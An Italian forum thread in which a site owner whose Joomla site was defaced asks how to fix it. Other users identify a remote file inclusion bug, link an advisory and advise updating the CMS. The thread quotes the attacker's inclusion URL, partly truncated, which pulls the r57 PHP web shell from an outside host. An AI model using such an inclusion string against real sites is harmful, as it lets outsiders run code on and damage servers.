il sito in questione è www.errabundimusici.it
ho contattato il defacciatore, 17enne turco, che dopo avermi preso un po per il sedere
riguardo gli europei
mi dice che ha sfruttato questo bug
http://www.errabundimusici.it/ultime...ell.in/r57.txt
che posso fare per correggere il tutto?
inoltre devo trovare il modo di riprendermi la vecchia home...
ma come si fa a recuperare il vecchio index.php...
La vulnerabilità usata è una remote inclusion presente fino alla versione 1.0.14 di Joomla.
http://secunia.com/advisories/29106/
Per risolvere il problema ti consiglio caldamante di aggiornare il tuo CMS all'ultima versione.
A meno che sia stata rinominata e lasciata sul server la tua vecchia home è quasi sicuramente persa.
Leggi il REGOLAMENTO!
E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
Drugo
Puoi recuperarla dalla cache di google..almeno spero!!
Ciao
Scusa Habanero ma cosa succederebbe cn quella stringa?
Entri nell'amministrazione?
Ciao e grazie!
Originariamente inviato da Analyzer
Ciao
Scusa Habanero ma cosa succederebbe cn quella stringa?
Entri nell'amministrazione?
Ciao e grazie!
No... con quella stringa fai si che del codice php recuperato da un server esterno (per la precisione da http://www.r57shell.in/r57.txt) venga eseguito sul tuo server. Immagina cosa succede (come in effetti succede) se quel codice php agisce sul filesystem locale... cancellazione di file, modifica di file etc...
Leggi il REGOLAMENTO!
E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
Drugo
speri male... google non può certo recuperare il codice lato server di un sito!!!!Originariamente inviato da Analyzer
Puoi recuperarla dalla cache di google..almeno spero!!
Leggi il REGOLAMENTO!
E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
Drugo
Ragazzi ho aggiornato il csm ed è ritornato tutto a posto
anche la home
il tipo praticamente ha caricato sul mio server un sacco di porcherie
addirittura un archivio....
ma come si fa a fare ste cose?
incredibile
Originariamente inviato da Argon
ma come si fa a fare ste cose?
Originariamente inviato da Habanero
No... con quella stringa fai si che del codice php recuperato da un server esterno (per la precisione da http://www.r57shell.in/r57.txt) venga eseguito sul tuo server. Immagina cosa succede (come in effetti succede) se quel codice php agisce sul filesystem locale... cancellazione di file, modifica di file etc...
Leggi il REGOLAMENTO!
E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
Drugo
Permessi di invio
Rispondi quotando